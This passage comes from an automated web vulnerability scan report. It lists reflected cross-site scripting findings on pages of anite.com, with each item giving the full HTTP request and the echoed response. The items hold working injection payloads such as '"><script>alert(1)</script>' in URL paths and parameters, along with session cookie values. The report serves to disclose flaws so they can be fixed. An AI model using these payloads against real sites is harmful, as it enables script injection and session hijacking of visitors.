The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b045"><a>315f8d8eca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html?9b045"><a>315f8d8eca6=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-delivers-first-to-market-td-lte-protocol-test-solutions-for-mobile-devices.html?9b045"><a>315f8d8eca6=1#up">
...[SNIP]...

1.30. http://anite.com/anite-leads-the-way-in-lte-carrier-acceptance-testing.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-leads-the-way-in-lte-carrier-acceptance-testing.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4392"><a>0a252052882 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-leads-the-way-in-lte-carrier-acceptance-testing.html?Itemid=228f4392"><a>0a252052882&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-leads-the-way-in-lte-carrier-acceptance-testing.html?Itemid=228f4392"><a>0a252052882&nomore=true#up">
...[SNIP]...

1.31. http://anite.com/anite-leads-the-way-in-lte-carrier-acceptance-testing.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-leads-the-way-in-lte-carrier-acceptance-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cfb5"><script>alert(1)</script>589e5f749f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8cfb5"><script>alert(1)</script>589e5f749f9 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/8cfb5"><script>alert(1)</script>589e5f749f9#up">
...[SNIP]...

1.32. http://anite.com/anite-leads-the-way-in-lte-carrier-acceptance-testing.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-leads-the-way-in-lte-carrier-acceptance-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef5c"><a>ddac96aab78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-leads-the-way-in-lte-carrier-acceptance-testing.html?7ef5c"><a>ddac96aab78=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-leads-the-way-in-lte-carrier-acceptance-testing.html?7ef5c"><a>ddac96aab78=1#up">
...[SNIP]...

1.33. http://anite.com/anite-plc-about-us-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-plc-about-us-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe65d"><a>007bcbf3958 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-plc-about-us-2.html?Itemid=458fe65d"><a>007bcbf3958 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35896

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-plc-about-us-2.html?Itemid=458fe65d"><a>007bcbf3958#up">
...[SNIP]...

1.34. http://anite.com/anite-plc-about-us-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-plc-about-us-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ba44"><script>alert(1)</script>a134929def7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /9ba44"><script>alert(1)</script>a134929def7?Itemid=458 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35970

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/9ba44"><script>alert(1)</script>a134929def7?Itemid=458#up">
...[SNIP]...

1.35. http://anite.com/anite-plc-about-us-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-plc-about-us-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b78c"><a>49045dfe875 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-plc-about-us-2.html?Itemid=458&9b78c"><a>49045dfe875=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35987

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-plc-about-us-2.html?Itemid=458&9b78c"><a>49045dfe875=1#up">
...[SNIP]...

1.36. http://anite.com/anite-plc-investor-relations-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-plc-investor-relations-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ca8"><a>7224fb88618 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-plc-investor-relations-3.html?Itemid=467f3ca8"><a>7224fb88618 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38147

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-plc-investor-relations-3.html?Itemid=467f3ca8"><a>7224fb88618#up">
...[SNIP]...

1.37. http://anite.com/anite-plc-investor-relations-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-plc-investor-relations-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c84"><script>alert(1)</script>07991e05ccc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /14c84"><script>alert(1)</script>07991e05ccc?Itemid=467 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38221

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/14c84"><script>alert(1)</script>07991e05ccc?Itemid=467#up">
...[SNIP]...

1.38. http://anite.com/anite-plc-investor-relations-3.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-plc-investor-relations-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 523ea"><a>0d117fda2b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-plc-investor-relations-3.html?Itemid=467&523ea"><a>0d117fda2b7=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38248

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-plc-investor-relations-3.html?Itemid=467&523ea"><a>0d117fda2b7=1#up">
...[SNIP]...

1.39. http://anite.com/anite-plc-recruitement-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-plc-recruitement-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35ed7"><a>e9263433afc was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-plc-recruitement-3.html?Itemid=46635ed7"><a>e9263433afc HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-plc-recruitement-3.html?Itemid=46635ed7"><a>e9263433afc#up">
...[SNIP]...

1.40. http://anite.com/anite-plc-recruitement-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-plc-recruitement-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aecb"><script>alert(1)</script>c5358560b14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6aecb"><script>alert(1)</script>c5358560b14 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/6aecb"><script>alert(1)</script>c5358560b14#up">
...[SNIP]...

1.41. http://anite.com/anite-plc-recruitement-3.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-plc-recruitement-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f022b"><a>0f846bcc972 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-plc-recruitement-3.html?f022b"><a>0f846bcc972=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-plc-recruitement-3.html?f022b"><a>0f846bcc972=1#up">
...[SNIP]...

1.42. http://anite.com/anite-travel.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-travel.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa029"><a>65ab8abd865 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-travel.html?Itemid=aa029"><a>65ab8abd865 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
